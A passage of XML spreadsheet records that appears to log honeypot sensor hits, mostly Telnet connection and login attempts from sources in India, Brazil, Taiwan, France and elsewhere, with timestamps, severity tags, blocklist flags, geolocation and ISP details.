    <d v="2025-04-17T05:55:58"/>
    <d v="2025-04-17T05:55:58"/>
    <d v="2025-04-17T05:55:58"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="UY"/>
    <s v="Uruguay"/>
    <s v="AR"/>
    <s v="Artigas"/>
    <s v="NA"/>
    <s v="Artigas"/>
    <s v="3443758"/>
    <s v="NA"/>
    <s v="-30.4"/>
    <s v="-56.4667"/>
    <s v="6057"/>
    <s v="AS6057"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="corporate"/>
    <s v="Administracion Nacional de Telecomunicaciones"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ba35:5d1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1398"/>
    <x v="1398"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T05:03:28"/>
    <d v="2025-04-14T22:20:34"/>
    <d v="2025-04-17T05:03:28"/>
    <n v="14"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="FL"/>
    <s v="Florida"/>
    <s v="Duval"/>
    <s v="Jacksonville"/>
    <s v="4160021"/>
    <s v="32255"/>
    <s v="30.3322"/>
    <s v="-81.6556"/>
    <s v="7922"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="Comcast Cable Communications, LLC"/>
    <s v="residential"/>
    <s v="Comcast IP Services, L.L.C."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:49f4:626"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1399"/>
    <x v="1399"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T04:57:12"/>
    <d v="2025-04-17T04:48:26"/>
    <d v="2025-04-17T04:57:12"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d8:3614"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1400"/>
    <x v="1400"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T04:41:07"/>
    <d v="2025-04-17T04:41:07"/>
    <d v="2025-04-17T04:41:07"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Pune"/>
    <s v="Khadki"/>
    <s v="1267195"/>
    <s v="NA"/>
    <s v="18.5635"/>
    <s v="73.8521"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:d61a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1401"/>
    <x v="1401"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T04:33:17"/>
    <d v="2025-04-17T04:33:17"/>
    <d v="2025-04-17T04:33:17"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai"/>
    <s v="Mumbai (Parel)"/>
    <s v="1275339"/>
    <s v="400012"/>
    <s v="19.0027"/>
    <s v="72.8286"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:744b:c582"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1402"/>
    <x v="1402"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T04:30:18"/>
    <d v="2025-04-17T04:09:55"/>
    <d v="2025-04-17T04:30:18"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="BSNL-GSM-NorthZone"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d2:de89"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1403"/>
    <x v="1403"/>
    <s v="NA&amp;&amp;122-116-52-49.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-17T03:52:47"/>
    <d v="2025-04-16T21:47:34"/>
    <d v="2025-04-17T03:52:47"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>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
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7a74:3431"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1404"/>
    <x v="1404"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T03:41:42"/>
    <d v="2025-04-17T02:18:24"/>
    <d v="2025-04-17T03:41:42"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cb:3e9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1405"/>
    <x v="1405"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T03:39:56"/>
    <d v="2025-04-17T03:39:56"/>
    <d v="2025-04-17T03:39:56"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="HCW"/>
    <s v="Central and Western"/>
    <s v="NA"/>
    <s v="Central"/>
    <s v="8223932"/>
    <s v="NA"/>
    <s v="22.2836"/>
    <s v="114.16"/>
    <s v="4760"/>
    <s v="HKTIMS-AP"/>
    <s v="Hong Kong Telecommunications (HKT) Limited Mass Internet"/>
    <s v="corporate"/>
    <s v="Hong Kong Telecommunications (HKT) Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7077:f99b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1406"/>
    <x v="1406"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T03:37:45"/>
    <d v="2025-04-16T13:23:58"/>
    <d v="2025-04-17T03:37:45"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="2008-03-19"/>
    <s v="MTNL"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7838:96d1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1407"/>
    <x v="1407"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T03:36:28"/>
    <d v="2025-04-17T03:36:28"/>
    <d v="2025-04-17T03:36:28"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="Nib"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75fb:a999"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1408"/>
    <x v="1408"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T03:12:08"/>
    <d v="2025-04-15T02:00:52"/>
    <d v="2025-04-17T03:12:08"/>
    <n v="65"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RJ"/>
    <s v="Rio de Janeiro"/>
    <s v="Nova Iguaçu"/>
    <s v="Nova Iguaçu"/>
    <s v="3456160"/>
    <s v="NA"/>
    <s v="-22.7592"/>
    <s v="-43.4511"/>
    <s v="28573"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="business"/>
    <s v="NET Serviços de Comunicação S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b39d:acb8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1409"/>
    <x v="1409"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T02:20:42"/>
    <d v="2025-04-17T02:20:42"/>
    <d v="2025-04-17T02:20:42"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75e9:a74b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1410"/>
    <x v="1410"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T02:17:06"/>
    <d v="2025-04-16T17:12:22"/>
    <d v="2025-04-17T02:17:06"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Samrāla"/>
    <s v="1257503"/>
    <s v="NA"/>
    <s v="30.836"/>
    <s v="76.1932"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="MTNL Mumbai"/>
    <s v="business"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:1470"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1411"/>
    <x v="1411"/>
    <s v="1-34-230-160.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T02:14:44"/>
    <d v="2024-12-25T11:44:52"/>
    <d v="2025-04-17T02:14:44"/>
    <n v="324"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="23&amp;&amp;80&amp;&amp;6789&amp;&amp;NA&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Hsinchu County"/>
    <s v="Zhubei"/>
    <s v="1677112"/>
    <s v="NA"/>
    <s v="24.8383"/>
    <s v="121.008"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:e6a0"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1412"/>
    <x v="1412"/>
    <s v="88-125-85-207.subs.proxad.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-17T02:12:40"/>
    <d v="2025-04-06T06:16:51"/>
    <d v="2025-04-17T02:12:40"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H5"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="FR"/>
    <s v="France"/>
    <s v="NAQ"/>
    <s v="Nouvelle-Aquitaine"/>
    <s v="Charente-Maritime"/>
    <s v="Saint-Martin-de-Ré"/>
    <s v="2978361"/>
    <s v="17410"/>
    <s v="46.2031"/>
    <s v="-1.36746"/>
    <s v="12322"/>
    <s v="Free SAS"/>
    <s v="Free SAS"/>
    <s v="residential"/>
    <s v="Free"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:587d:55cf"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1413"/>
    <x v="1413"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-17T01:00:57"/>
    <d v="2025-04-17T01:00:57"/>
    <d v="2025-04-17T01:00:57"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb7:9554"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
